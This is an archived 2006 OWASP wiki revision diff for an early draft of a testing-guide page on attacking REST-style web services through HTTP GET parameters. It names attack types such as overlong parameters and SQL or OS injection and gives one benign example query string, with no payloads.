This site is the archived OWASP Foundation Wiki and is no longer accepting Account Requests.
To view the new OWASP Foundation website, please visit https://owasp.org
Difference between revisions of "Testing for WS HTTP GET parameters/REST attacks (OWASP-WS-005)"
Line 1: | Line 1: | ||
'''HTTP GET parameters.''' | '''HTTP GET parameters.''' | ||
+ | ===Brief Summary=== | ||
Many XML applications are invoked by passing them parameters using HTTP GET queries. | Many XML applications are invoked by passing them parameters using HTTP GET queries. | ||
+ | These are sometimes known as “REST-style" Web Services. These Web Services can be attacked by passing malicious content on the HTTP GET string (e.g. Extra long parameters (2048 chars), SQL statements/injection or OS Injection parameters). | ||
+ | REST = Representational State Transfer). | ||
+ | |||
+ | |||
+ | === Description of the Issue === | ||
+ | Given that Web services REST are in effect HTTP-In -> WS-OUT at attack patterns are very similar to regular HTTP attack vectors, discussed throughout the guide. | ||
+ | |||
+ | '''Example:''' | ||
+ | The HTTP request with query string /viewDetail=detail-10293, the HTTP GET parameter is ''detail- 10293''. | ||
− | + | ===Black Box Testing=== | |
− | |||
− | + | ===Grey Box Testing=== | |
− | + | ||
+ | ===References=== |
Revision as of 10:58, 2 November 2006
HTTP GET parameters.
Brief Summary
Many XML applications are invoked by passing them parameters using HTTP GET queries. These are sometimes known as “REST-style" Web Services. These Web Services can be attacked by passing malicious content on the HTTP GET string (e.g. Extra long parameters (2048 chars), SQL statements/injection or OS Injection parameters). REST = Representational State Transfer).
Description of the Issue
Given that Web services REST are in effect HTTP-In -> WS-OUT at attack patterns are very similar to regular HTTP attack vectors, discussed throughout the guide.
Example: The HTTP request with query string /viewDetail=detail-10293, the HTTP GET parameter is detail- 10293.